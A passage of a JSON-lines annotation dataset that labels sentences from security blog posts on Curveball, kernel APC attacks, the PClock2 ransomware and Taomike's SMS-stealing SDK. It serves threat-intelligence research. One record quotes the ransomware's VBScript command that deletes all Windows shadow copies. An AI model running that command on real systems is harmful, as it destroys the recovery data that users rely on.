email address!","entities":[],"relations":[],"Comments":[]} {"id":817,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":818,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":819,"text":"This post is also available in: 日本語 (Japanese) In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball.","entities":[{"id":44869,"label":"TIME","start_offset":56,"end_offset":68},{"id":44870,"label":"identity","start_offset":118,"end_offset":127},{"id":44871,"label":"TIME","start_offset":93,"end_offset":100},{"id":44872,"label":"vulnerability","start_offset":190,"end_offset":203},{"id":44873,"label":"vulnerability","start_offset":213,"end_offset":222}],"relations":[],"Comments":[]} {"id":820,"text":"The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation.","entities":[{"id":46367,"label":"FILEPATH","start_offset":51,"end_offset":62},{"id":46368,"label":"SOFTWARE","start_offset":32,"end_offset":49}],"relations":[],"Comments":[]} {"id":821,"text":"At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW).","entities":[{"id":46369,"label":"identity","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} {"id":822,"text":"Researcher Tal Be’ery released a blog titled “Win 10 Crypto Vulnerability: Cheating in Elliptic Curve Billiard 2” that does a fantastic job at explaining this bug.","entities":[{"id":2688,"label":"location","start_offset":136,"end_offset":139},{"id":46370,"label":"SOFTWARE","start_offset":46,"end_offset":52},{"id":44874,"label":"identity","start_offset":11,"end_offset":21}],"relations":[],"Comments":[]} {"id":823,"text":" The patch provided by Microsoft included the typical release of operating system patches, but this time a new Application Programming Interface (API) function was added.","entities":[{"id":46371,"label":"SOFTWARE","start_offset":23,"end_offset":32}],"relations":[],"Comments":[]} {"id":824,"text":"The new CveEventWrite function can be used to publish events when an attempt to exploit security vulnerabilities in user-mode applications occurs.","entities":[],"relations":[],"Comments":[]} {"id":825,"text":"Analysts can collect alerts on the Application Message “CVE-2020-0601” as a means to hunt for attempted exploitation of this vulnerability on patched systems.","entities":[{"id":46372,"label":"vulnerability","start_offset":56,"end_offset":69}],"relations":[],"Comments":[]} {"id":826,"text":" We also recommend users of the Chrome browser to update to version 79.0.3945.130 as they recently released an update to fix the TLS issue. Palo Alto Networks customers running Traps are now safeguarded from the Windows CryptoAPI Spoofing vulnerability, regardless of whether they are running an unpatched Microsoft Windows 10 system.","entities":[{"id":46376,"label":"SOFTWARE","start_offset":307,"end_offset":328},{"id":46375,"label":"SOFTWARE","start_offset":213,"end_offset":230},{"id":46373,"label":"SOFTWARE","start_offset":32,"end_offset":38},{"id":46374,"label":"identity","start_offset":141,"end_offset":159}],"relations":[],"Comments":[]} {"id":827,"text":"Additionally, Palo Alto Networks offers multiple, additional complementary protections:","entities":[{"id":46377,"label":"identity","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} {"id":828,"text":"As a member of the Microsoft Active Protections Program (MAPP) program, Palo Alto Networks received early details of the vulnerability, providing greater understanding of the threat, which helps us implement strong product coverage.","entities":[{"id":46378,"label":"identity","start_offset":19,"end_offset":62},{"id":44876,"label":"identity","start_offset":72,"end_offset":90}],"relations":[],"Comments":[]} {"id":829,"text":"As always, we recommend keeping your Microsoft products up to date with the latest patches to mitigate this vulnerability.","entities":[{"id":46379,"label":"identity","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} {"id":830,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. CVE-2020-0601: The ChainOfFools\/CurveBall Attack Explained POC Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2 NSA Cybersecurity Advisory Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46383,"label":"identity","start_offset":250,"end_offset":253},{"id":46384,"label":"vulnerability","start_offset":137,"end_offset":149},{"id":46381,"label":"vulnerability","start_offset":118,"end_offset":131},{"id":46382,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":46380,"label":"identity","start_offset":1,"end_offset":19},{"id":46385,"label":"vulnerability","start_offset":150,"end_offset":159}],"relations":[],"Comments":[]} {"id":831,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":832,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":833,"text":"In the months since the WanaCrypt0r\/WannaCry and the Petya\/NotPetya attacks, security researchers have delved into the nuts and bolts these incidents and the malware involved.","entities":[{"id":2720,"label":"malware","start_offset":36,"end_offset":44},{"id":2722,"label":"malware","start_offset":53,"end_offset":58},{"id":2723,"label":"malware","start_offset":59,"end_offset":67},{"id":2719,"label":"malware","start_offset":24,"end_offset":35}],"relations":[],"Comments":[]} {"id":834,"text":" One key thing that research into these security incidents shows is that these attacks used a relatively new and unknown technique called kernel APC attacks as part of their toolkit.","entities":[{"id":44878,"label":"attack-pattern","start_offset":138,"end_offset":156}],"relations":[],"Comments":[]} {"id":835,"text":" Kernel APC attacks occur in a way that increases the “stealth” factor and makes standard detection and prevention very difficult.","entities":[{"id":46386,"label":"attack-pattern","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":836,"text":"And kernel APC attacks do this while still maximizing the power and control that the code has on the target system.","entities":[{"id":46387,"label":"attack-pattern","start_offset":3,"end_offset":22}],"relations":[],"Comments":[]} {"id":837,"text":" While kernel APC attacks aren’t well known and can be hard to understand, their proven success in WanaCrypt0r\/WannaCry and the Petya\/NotPetya make them an important threat to understand because proven attack techniques are quickly adopted widely.","entities":[{"id":2746,"label":"malware","start_offset":128,"end_offset":133},{"id":44880,"label":"attack-pattern","start_offset":7,"end_offset":25},{"id":44881,"label":"malware","start_offset":99,"end_offset":110},{"id":44882,"label":"malware","start_offset":111,"end_offset":119},{"id":44884,"label":"malware","start_offset":134,"end_offset":142}],"relations":[{"id":185,"from_id":44882,"to_id":44880,"type":"uses"},{"id":186,"from_id":2746,"to_id":44880,"type":"uses"},{"id":184,"from_id":44881,"to_id":44880,"type":"uses"},{"id":187,"from_id":44884,"to_id":44880,"type":"uses"}],"Comments":[]} {"id":838,"text":"And understanding is a first step to prevention.","entities":[],"relations":[],"Comments":[]} {"id":839,"text":" To understand what makes kernel APC attacks so dangerous, it’s important to understand what they are. The kernel is the heart of the operating system.","entities":[{"id":46388,"label":"attack-pattern","start_offset":26,"end_offset":44}],"relations":[],"Comments":[]} {"id":840,"text":"When talking about operating systems with security permissions and controls like Windows or UNIX\/Linux, the kernel operates with the highest level of control.","entities":[{"id":46392,"label":"SOFTWARE","start_offset":97,"end_offset":102},{"id":46391,"label":"SOFTWARE","start_offset":92,"end_offset":96},{"id":44885,"label":"SOFTWARE","start_offset":81,"end_offset":88}],"relations":[],"Comments":[]} {"id":841,"text":"Because of this, attacks against the kernel are used to gain complete control over a system, generally as part of an “elevation or privilege” (EoP) or “privilege escalation” attack.","entities":[{"id":2756,"label":"attack-pattern","start_offset":152,"end_offset":172},{"id":46393,"label":"attack-pattern","start_offset":118,"end_offset":140}],"relations":[],"Comments":[]} {"id":842,"text":"Typically, attacks against the kernel are used in conjunction with code execution attacks so that an attacker can target a limited privilege user but ultimately gain full control over the system.","entities":[],"relations":[],"Comments":[]} {"id":843,"text":" Privilege escalation attacks against the kernel have been around for some time and are well-known and can be well protected against. Kernel APC attacks however are a different class of attack.","entities":[{"id":2760,"label":"attack-pattern","start_offset":1,"end_offset":21},{"id":44889,"label":"attack-pattern","start_offset":135,"end_offset":153}],"relations":[],"Comments":[]} {"id":844,"text":"These don’t attack the kernel to gain privileges.","entities":[],"relations":[],"Comments":[]} {"id":845,"text":"Instead kernel APC attacks already have kernel privileges and use them to further carry out their attack.","entities":[{"id":46394,"label":"attack-pattern","start_offset":8,"end_offset":26}],"relations":[],"Comments":[]} {"id":846,"text":"In this case by making legitimate programs execute malicious code rather than their own legitimate code.","entities":[{"id":44890,"label":"attack-pattern","start_offset":43,"end_offset":65}],"relations":[],"Comments":[]} {"id":847,"text":" Kernel APC attacks do this using their control over the kernel to redirect APCs: “Asynchronous Procedure Calls”.","entities":[{"id":46395,"label":"attack-pattern","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} {"id":848,"text":"APCs can basically be thought of as places in line for the CPU that the kernel gives access to.","entities":[],"relations":[],"Comments":[]} {"id":849,"text":"In a kernel APC attack, the attacker gives a legitimate program’s place in line to the attacker’s code.","entities":[{"id":44891,"label":"attack-pattern","start_offset":5,"end_offset":22}],"relations":[],"Comments":[]} {"id":850,"text":" The crux of what makes this attack technique so important is how the technique uses this level of control to have legitimate programs run illegitimate commands.","entities":[],"relations":[],"Comments":[]} {"id":851,"text":"It’s easier to detect and prevent illegitimate programs (malware) from executing commands.","entities":[],"relations":[],"Comments":[]} {"id":852,"text":"But when legitimate programs execute illegitimate commands, it’s harder to detect and prevent: it’s not always clear whether a command is legitimate or not, and interfering with commands from legitimate programs can have significant (sometimes catastrophic) unintended consequences.","entities":[],"relations":[],"Comments":[]} {"id":853,"text":"And finally because of ways that kernel APC attacks are carried out, it doesn’t leave the usual fingerprints you find after an attack making detection harder still.","entities":[],"relations":[],"Comments":[]} {"id":854,"text":" Taken altogether, these make kernel APC attacks an effective and sophisticated technique.","entities":[{"id":46396,"label":"attack-pattern","start_offset":30,"end_offset":48}],"relations":[],"Comments":[]} {"id":855,"text":"And while this technique alone isn’t solely responsible for the damaging power of WanaCrypt0r\/WannaCry and Petya\/NotPetya it is certainly an important contributing factor.","entities":[{"id":2781,"label":"malware","start_offset":82,"end_offset":93},{"id":2784,"label":"malware","start_offset":107,"end_offset":112},{"id":44893,"label":"malware","start_offset":94,"end_offset":102},{"id":44895,"label":"malware","start_offset":113,"end_offset":121}],"relations":[],"Comments":[]} {"id":856,"text":" Perhaps more importantly, it’s a piece of those attacks that has escaped relative notice outside of some specialized parts of the research community.","entities":[],"relations":[],"Comments":[]} {"id":857,"text":" New effective attack techniques that escape notice are always inviting for other copycat attackers.","entities":[],"relations":[],"Comments":[]} {"id":858,"text":"A good way to defend against this is to understand and be aware of the thread: forewarned is forearmed.","entities":[],"relations":[],"Comments":[]} {"id":859,"text":" If you want a more detailed understanding of kernel APC attacks as they occurred in WanaCrypt0r\/WannaCry, two good resources are Microsoft’s MMPC blog “WannaCrypt ransomware worm targets out-of-date systems” and Countercept’s “DOUBLEPULSAR Usermode Analysis: Generic Reflective DLL Loader”.","entities":[{"id":2796,"label":"identity","start_offset":130,"end_offset":139},{"id":2800,"label":"malware","start_offset":228,"end_offset":240},{"id":2791,"label":"malware","start_offset":85,"end_offset":96},{"id":2792,"label":"malware","start_offset":97,"end_offset":105},{"id":46397,"label":"malware","start_offset":153,"end_offset":163}],"relations":[],"Comments":[]} {"id":860,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":861,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":862,"text":"In recent years, ransomware families are often glamorized as being some of the most dangerous types of malware.","entities":[],"relations":[],"Comments":[]} {"id":863,"text":"They’ve certainly caused a wealth of damage to end users with some of the more prominent malware families, such as CryptoLocker, CryptoWall, TorrentLocker, and TeslaCrypt infecting millions of users overall.","entities":[{"id":46398,"label":"malware","start_offset":160,"end_offset":170},{"id":46399,"label":"malware","start_offset":141,"end_offset":154},{"id":46400,"label":"malware","start_offset":129,"end_offset":139},{"id":46401,"label":"malware","start_offset":115,"end_offset":128}],"relations":[],"Comments":[]} {"id":864,"text":" For readers that might be unfamiliar with ransomware, it’s a type of malware that is responsible for encrypting a user’s files with a key known only to the attackers.","entities":[],"relations":[],"Comments":[]} {"id":865,"text":"Examples of files that might be encrypted include financial documents, home movies, photos, or business-related files.","entities":[],"relations":[],"Comments":[]} {"id":866,"text":"In order to decrypt these files, the victim must provide a ransom, or payment, to the attacker, often in the form of a digital currency.","entities":[],"relations":[],"Comments":[]} {"id":867,"text":"While ransomware is often thought to be bullet-proof, it is certainly not always the case.","entities":[],"relations":[],"Comments":[]} {"id":868,"text":"In early 2015, Emnisoft identified a new family of malware named PClock.","entities":[{"id":46402,"label":"identity","start_offset":15,"end_offset":23},{"id":46405,"label":"TIME","start_offset":3,"end_offset":13},{"id":46403,"label":"malware","start_offset":65,"end_offset":71}],"relations":[],"Comments":[]} {"id":869,"text":"At the time, the malware was riddled with issues, specifically in the way it encrypted files.","entities":[],"relations":[],"Comments":[]} {"id":870,"text":"It used a simple XOR encryption routine with a static key, allowing victims to easily recover their files without paying a ransom.","entities":[],"relations":[],"Comments":[]} {"id":871,"text":" In August, we started detecting updated copies of PClock, which has been improved upon by the malware author.","entities":[{"id":46406,"label":"TIME","start_offset":4,"end_offset":10},{"id":46407,"label":"malware","start_offset":51,"end_offset":57}],"relations":[],"Comments":[]} {"id":872,"text":"We set out to determine if this updated version of PClock holds up to some of the more prominent families.","entities":[{"id":46408,"label":"malware","start_offset":51,"end_offset":57}],"relations":[],"Comments":[]} {"id":873,"text":"For the sake of clarity, I will refer to this newer version of PClock as PClock2 going forward.","entities":[{"id":44897,"label":"malware","start_offset":73,"end_offset":80},{"id":44896,"label":"malware","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} {"id":874,"text":" The following sample is used for analysis: Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":875,"text":"PClock2","entities":[{"id":46409,"label":"malware","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":876,"text":"analysis sample PClock2 is written in Visual Basic.","entities":[{"id":46410,"label":"SOFTWARE","start_offset":39,"end_offset":51},{"id":44898,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":188,"from_id":44898,"to_id":46410,"type":"uses"}],"Comments":[]} {"id":877,"text":"For a copy of this file’s IDA Pro database (idb), please refer here.","entities":[{"id":46411,"label":"SOFTWARE","start_offset":26,"end_offset":33}],"relations":[],"Comments":[]} {"id":878,"text":" When initially executed, PClock2 performs a very simple anti-analysis check where it will sleep for a random amount of time and compare the time spent sleeping against a set value.","entities":[{"id":46412,"label":"malware","start_offset":26,"end_offset":33}],"relations":[],"Comments":[]} {"id":879,"text":"This check is essentially looking for sandbox systems where the sleep function accelerates analysis.","entities":[],"relations":[],"Comments":[]} {"id":880,"text":" Figure 2. Check by PClock2 for hooking of sleep function A simple check is performed to determine if the malware is running with administrative privileges.","entities":[{"id":46413,"label":"malware","start_offset":20,"end_offset":27},{"id":46414,"label":"attack-pattern","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} {"id":881,"text":"Once completed, the malware sends the result via an HTTP POST request to a remote server.","entities":[],"relations":[],"Comments":[]} {"id":882,"text":"All data sent via HTTP POST requests is sent in the clear.","entities":[],"relations":[],"Comments":[]} {"id":883,"text":"Figure 3. HTTP POST request containing administrative privileges ","entities":[],"relations":[],"Comments":[]} {"id":884,"text":"The ‘P0’ is statically set by the malware in the above request.","entities":[],"relations":[],"Comments":[]} {"id":885,"text":"The ‘1828’ represents the thread ID (TID) of the malware, while the ‘rnd’ GET variable is randomly generated.","entities":[],"relations":[],"Comments":[]} {"id":886,"text":" Throughout the runtime of PClock2, it makes multiple HTTP POST requests to a remote server using the same characteristics, including the ‘PO[TID]’ and the current time.","entities":[{"id":46416,"label":"malware","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} {"id":887,"text":"Additionally, the user-agent used by the entire PClock family, including PClock2, is consistent across samples.","entities":[{"id":46417,"label":"malware","start_offset":48,"end_offset":54},{"id":46418,"label":"malware","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":888,"text":" PClock2 proceeds to copy itself with the name “winjab.exe” in the following path.","entities":[{"id":44900,"label":"FILEPATH","start_offset":48,"end_offset":58},{"id":44899,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":889,"text":"While this particular sample is seen installing itself to the %ALLUSERSPROFILE% path, other samples have been witnessed using %APPDATA% instead.","entities":[{"id":46419,"label":"FILEPATH","start_offset":62,"end_offset":79},{"id":46420,"label":"FILEPATH","start_offset":126,"end_offset":135}],"relations":[],"Comments":[]} {"id":890,"text":" PClock2 also enables persistence by setting the following registry key.","entities":[{"id":46421,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":891,"text":"All instances of the entire PClock family have been found to use this particular registry key.","entities":[{"id":44901,"label":"malware","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":892,"text":" After installation is complete, the malware makes another HTTP POST containing the various file paths it used.","entities":[],"relations":[],"Comments":[]} {"id":893,"text":" Figure 4. HTTP POST request containing file paths of malware After installation, PClock2 will also set the following registry key with a value of ‘INSTALL_OK’.","entities":[{"id":46422,"label":"malware","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} {"id":894,"text":" This particular registry key is used to hold the latest state of the malware.","entities":[],"relations":[],"Comments":[]} {"id":895,"text":"Other messages that might be present in this key include the following.","entities":[],"relations":[],"Comments":[]} {"id":896,"text":" The following registry keys are also used within the CLOCK sub-path by PClock2: PClock2 proceeds to use the API from blockchain.info to generate a unique Bitcoin (BTC) wallet identifier, which is configured to automatically forward payments to a hardcoded wallet identifier of ‘1MRfkK134ErfbcadUSoSUCBahngCqoBKju’.","entities":[{"id":46423,"label":"malware","start_offset":72,"end_offset":79},{"id":46424,"label":"malware","start_offset":82,"end_offset":89},{"id":46425,"label":"DOMAIN","start_offset":119,"end_offset":134}],"relations":[],"Comments":[]} {"id":897,"text":"The following HTTPS request accomplishes this.","entities":[],"relations":[],"Comments":[]} {"id":898,"text":" PClock2 will also make a request to the following blockchain.info address to determine the current value of BTC.","entities":[{"id":46427,"label":"DOMAIN","start_offset":51,"end_offset":66},{"id":46426,"label":"malware","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":899,"text":"This information is stored in the ‘\\BData\\B’ registry key as previously stated.","entities":[{"id":46428,"label":"REGISTRYKEY","start_offset":35,"end_offset":43}],"relations":[],"Comments":[]} {"id":900,"text":" The malware proceeds to generate a unique key that will be used in subsequent file encryption using the following data: This data is concatenated to form a string similar to the following: Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":901,"text":"Data collected to be used in formation of unique key This data is then hashed using the SHA256 algorithm to generate a unique key.","entities":[],"relations":[],"Comments":[]} {"id":902,"text":"This key is stored in the ‘\\CData\\C’ registry key as previously stated.","entities":[{"id":46429,"label":"REGISTRYKEY","start_offset":27,"end_offset":35}],"relations":[],"Comments":[]} {"id":903,"text":"This key is also sent via a HTTP POST request.","entities":[],"relations":[],"Comments":[]} {"id":904,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":905,"text":"HTTP POST request containing unique SHA256 key PClock2 scans the file system of the victim in order to identify files that are to be encrypted.","entities":[],"relations":[],"Comments":[]} {"id":906,"text":"The following paths are ignored: Additionally, for a list of targeted file types, please see the following link.","entities":[],"relations":[],"Comments":[]} {"id":907,"text":" Once files are identified, PClock will begin encrypting them, one-by-one.","entities":[{"id":46430,"label":"malware","start_offset":28,"end_offset":34}],"relations":[],"Comments":[]} {"id":908,"text":"Unlike the original version of PClock, this variant has forgone the simple XOR encryption routine in place of using RC4.","entities":[{"id":46431,"label":"malware","start_offset":31,"end_offset":37}],"relations":[],"Comments":[]} {"id":909,"text":"The RC4 key is generated by concatenating the SHA256 value previously generated with the path to the file being encrypted.","entities":[],"relations":[],"Comments":[]} {"id":910,"text":"250dd811187959220220574a185ccf669e06c0ee3926773a7cb94750c401812cC:\\Documents and Settings\\Administrator\\Desktop\\Form1.cs ","entities":[{"id":2878,"label":"SHA1","start_offset":0,"end_offset":76},{"id":46432,"label":"FILEPATH","start_offset":81,"end_offset":121}],"relations":[],"Comments":[]} {"id":911,"text":"It should be noted that PClock takes a very long time to encrypt these files.","entities":[{"id":46433,"label":"malware","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} {"id":912,"text":"On a test sandbox, the malware took upwards of 20 minutes to complete encryption, which is less than ideal for an attacker as it gives the victim time to notice the infection and stop it.","entities":[{"id":46434,"label":"TIME","start_offset":36,"end_offset":57}],"relations":[],"Comments":[]} {"id":913,"text":"By comparison, the latest version of the CryptoWall malware family takes roughly 1-3 minutes to complete its encryption routine.","entities":[{"id":2888,"label":"malware","start_offset":41,"end_offset":51},{"id":2889,"label":"TIME","start_offset":73,"end_offset":92}],"relations":[],"Comments":[]} {"id":914,"text":" It’s also interesting to note that each time PClock2 scans a directory or encrypts a file, it makes an HTTP POST request to the C2 server.","entities":[{"id":46436,"label":"Infrastucture","start_offset":129,"end_offset":138},{"id":46435,"label":"malware","start_offset":46,"end_offset":53}],"relations":[{"id":189,"from_id":46435,"to_id":46436,"type":"beacons-to"}],"Comments":[]} {"id":915,"text":" Figure 7. HTTP POST request indicating a folder is being scanned This resulted in over 1,000 requests being made on a sandbox machine, which contained little data of interest.","entities":[],"relations":[],"Comments":[]} {"id":916,"text":" After it finished the encryption routine, PClock2 generates a VBScript file in the following directory:","entities":[{"id":46437,"label":"malware","start_offset":43,"end_offset":50},{"id":46438,"label":"SOFTWARE","start_offset":63,"end_offset":71}],"relations":[],"Comments":[]} {"id":917,"text":" This script file contains the following commands, which will delete shadow copies on the Windows operating system.","entities":[{"id":46439,"label":"SOFTWARE","start_offset":90,"end_offset":114}],"relations":[],"Comments":[]} {"id":918,"text":" Set UAC = CreateObject(\"Shell.Application\") UAC.ShellExecute \"vssadmin\", \"Delete Shadows \/All \/Quiet\", \"\", \"runas\", 1 On Windows XP, the following dialog box appears to the victim when this script runs, making it fairly apparent that something suspicious is occurring: Figure 8.","entities":[{"id":46440,"label":"SOFTWARE","start_offset":123,"end_offset":133}],"relations":[],"Comments":[]} {"id":919,"text":"Dialog box that appears to victim when VBS attempts to run ","entities":[],"relations":[],"Comments":[]} {"id":920,"text":"After running the clean up script the malware overwrites the ‘\\CData\\C’ registry key with a value of zero, which removes the unique SHA256 key.","entities":[{"id":46441,"label":"REGISTRYKEY","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} {"id":921,"text":"Finally, the malware changes the victim’s wallpaper and generates a GUI instructing the victim how they can provide payment and retrieve their files.","entities":[],"relations":[],"Comments":[]} {"id":922,"text":"This dialogue mimics the more-capable “CryptoLocker” malware family and provides instructions in both English and Spanish.","entities":[{"id":2904,"label":"malware","start_offset":39,"end_offset":51}],"relations":[],"Comments":[]} {"id":923,"text":"Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":924,"text":"Ransom demand ","entities":[],"relations":[],"Comments":[]} {"id":925,"text":"I originally wished to determine if the new version of PClock, PClock 2, included enough improvements to compete with some of the larger ransomware malware families, such as CryptoWall, TeslaCrypt, or TorrentLocker.","entities":[{"id":2911,"label":"malware","start_offset":174,"end_offset":184},{"id":2913,"label":"malware","start_offset":201,"end_offset":214},{"id":46442,"label":"malware","start_offset":186,"end_offset":196},{"id":46446,"label":"malware","start_offset":63,"end_offset":71},{"id":46447,"label":"malware","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} {"id":926,"text":"In truth, this version has made a number of improvements, such as adding more file types to target, ignoring certain directories, and using a better encryption routine.","entities":[],"relations":[],"Comments":[]} {"id":927,"text":" However, a number of strong issues still plague this malware family, such as the following: While this version is an improvement, it still lacks many of the features and stealth that are currently present in the larger ransomware families.","entities":[],"relations":[],"Comments":[]} {"id":928,"text":"While ransomware is a large problem for users, it’s important to realize that not all malware families are created equal.","entities":[],"relations":[],"Comments":[]} {"id":929,"text":"Like most things in life, malware comes in many shapes and forms, from the more elegant and robust solutions, to those that come up lacking.","entities":[],"relations":[],"Comments":[]} {"id":930,"text":" All PClock malware family samples are properly classified as malicious by WildFire.","entities":[{"id":44902,"label":"malware","start_offset":5,"end_offset":11},{"id":44903,"label":"identity","start_offset":75,"end_offset":83}],"relations":[],"Comments":[]} {"id":931,"text":"AutoFocus users can find more information on samples and indicators related to this attack by viewing the PClock tag.","entities":[{"id":46448,"label":"malware","start_offset":106,"end_offset":112}],"relations":[],"Comments":[]} {"id":932,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":933,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":934,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":935,"text":"Mobile app creators are often looking for ways to monetize their software.","entities":[],"relations":[],"Comments":[]} {"id":936,"text":"One of the most common ways to do this is by displaying advertisements to users or by offering in-app purchases (IAPs).","entities":[],"relations":[],"Comments":[]} {"id":937,"text":"Mobile monetization platforms create software libraries that authors can embed into their apps to start earning money quickly.","entities":[],"relations":[],"Comments":[]} {"id":938,"text":"We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.","entities":[],"relations":[],"Comments":[]} {"id":939,"text":" While not all SMS-based IAP applications steal user data, we recently identified that the Chinese Taomike SDK has begun capturing copies of all messages received by the phone and sending them to a Taomike controlled server.","entities":[{"id":46449,"label":"location","start_offset":91,"end_offset":98},{"id":44904,"label":"attack-pattern","start_offset":42,"end_offset":57},{"id":44905,"label":"malware","start_offset":99,"end_offset":110},{"id":44907,"label":"Infrastucture","start_offset":198,"end_offset":223}],"relations":[{"id":37,"from_id":44905,"to_id":44907,"type":"exfiltrates-to"},{"id":38,"from_id":44905,"to_id":44907,"type":"communicates-with"},{"id":190,"from_id":44905,"to_id":46449,"type":"located-at"},{"id":191,"from_id":44905,"to_id":44904,"type":"uses"}],"Comments":[]} {"id":940,"text":"Since August 1, Palo Alto Networks WildFire has captured over 18,000 Android apps that contain this library.","entities":[{"id":46451,"label":"TIME","start_offset":6,"end_offset":14},{"id":46450,"label":"identity","start_offset":16,"end_offset":43},{"id":46452,"label":"SOFTWARE","start_offset":69,"end_offset":76}],"relations":[],"Comments":[]} {"id":941,"text":"These apps are not hosted inside the Google Play store, but are distributed via third party distribution mechanisms in China.","entities":[{"id":46453,"label":"SOFTWARE","start_offset":37,"end_offset":54},{"id":46454,"label":"location","start_offset":119,"end_offset":124}],"relations":[],"Comments":[]} {"id":942,"text":"Background WildFire captures many samples of mobile malware that intercept and upload SMS messages.","entities":[{"id":44908,"label":"identity","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} {"id":943,"text":"Most of these are created by malware authors who set up command and control (C2) servers with third party hosting providers and frequently update their locations to avoid detection.","entities":[],"relations":[],"Comments":[]} {"id":944,"text":" Among these malware we have found many that are created by “mobile monetization” companies who distribute apps that provide little value but have a high cost to the user.","entities":[],"relations":[],"Comments":[]} {"id":945,"text":"These apps are often installed by tricking users into clicking a pop-up, only to find later that a charge has appeared on their phone bill.","entities":[{"id":44909,"label":"attack-pattern","start_offset":34,"end_offset":48}],"relations":[],"Comments":[]} {"id":946,"text":"Antivirus programs typically identify these apps as malware, the topic of this blog is something different and harder to detect.","entities":[],"relations":[],"Comments":[]} {"id":947,"text":" Taomike is a Chinese company that aims to become the biggest mobile advertisement solution platform in China.","entities":[{"id":46455,"label":"identity","start_offset":1,"end_offset":8},{"id":46456,"label":"location","start_offset":14,"end_offset":21},{"id":46457,"label":"location","start_offset":104,"end_offset":109}],"relations":[{"id":192,"from_id":46455,"to_id":46456,"type":"located-at"}],"Comments":[]} {"id":948,"text":"They provide an SDK and services to help developers display rich advertisements with a high pay rate.","entities":[],"relations":[],"Comments":[]} {"id":949,"text":"Taomike has not previously been associated with malicious activity, but a recent update to their software added SMS theft functionality.","entities":[{"id":46458,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":950,"text":"The apps this library is embedded in may be legitimate and have significant functionality, but their developer’s choice to use this library has put them at risk. Technical Details:","entities":[],"relations":[],"Comments":[]} {"id":951,"text":"SMS Theft ","entities":[{"id":44910,"label":"attack-pattern","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":952,"text":"Not all apps that use the Taomike library steal SMS messages.","entities":[{"id":46459,"label":"identity","start_offset":26,"end_offset":33},{"id":46460,"label":"attack-pattern","start_offset":42,"end_offset":60}],"relations":[{"id":193,"from_id":46459,"to_id":46460,"type":"uses"}],"Comments":[]} {"id":953,"text":"Our analysis indicates that only samples that contain the embedded URL, hxxp:\/\/112.126.69.51\/2c.php have this functionality.","entities":[{"id":46461,"label":"URL","start_offset":72,"end_offset":99}],"relations":[],"Comments":[]} {"id":954,"text":"This is the URL to which the software uploads SMS messages, and the IP address belongs to the Taomike API server used by other Taomike services.","entities":[{"id":46462,"label":"identity","start_offset":127,"end_offset":134},{"id":44911,"label":"Infrastucture","start_offset":94,"end_offset":112}],"relations":[],"Comments":[]} {"id":955,"text":"We have captured around 63,000 Android apps in WildFire that include the Taomike library but only around 18,000 include the SMS theft functionality.","entities":[{"id":2996,"label":"SOFTWARE","start_offset":47,"end_offset":55},{"id":46463,"label":"identity","start_offset":73,"end_offset":80},{"id":46464,"label":"attack-pattern","start_offset":124,"end_offset":133}],"relations":[],"Comments":[]} {"id":956,"text":" We believe there are different versions of the Taomike SDK and only some of them include SMS uploading behavior.","entities":[{"id":46465,"label":"identity","start_offset":50,"end_offset":57}],"relations":[],"Comments":[]} {"id":957,"text":"Based on our data, the version that contains the SMS stealing functions is newer and was released around August 2015.","entities":[{"id":44912,"label":"TIME","start_offset":105,"end_offset":116},{"id":44913,"label":"attack-pattern","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} {"id":958,"text":"Apps that use earlier versions of the library appear to be safe.","entities":[],"relations":[],"Comments":[]} {"id":959,"text":" The Taomike library is called 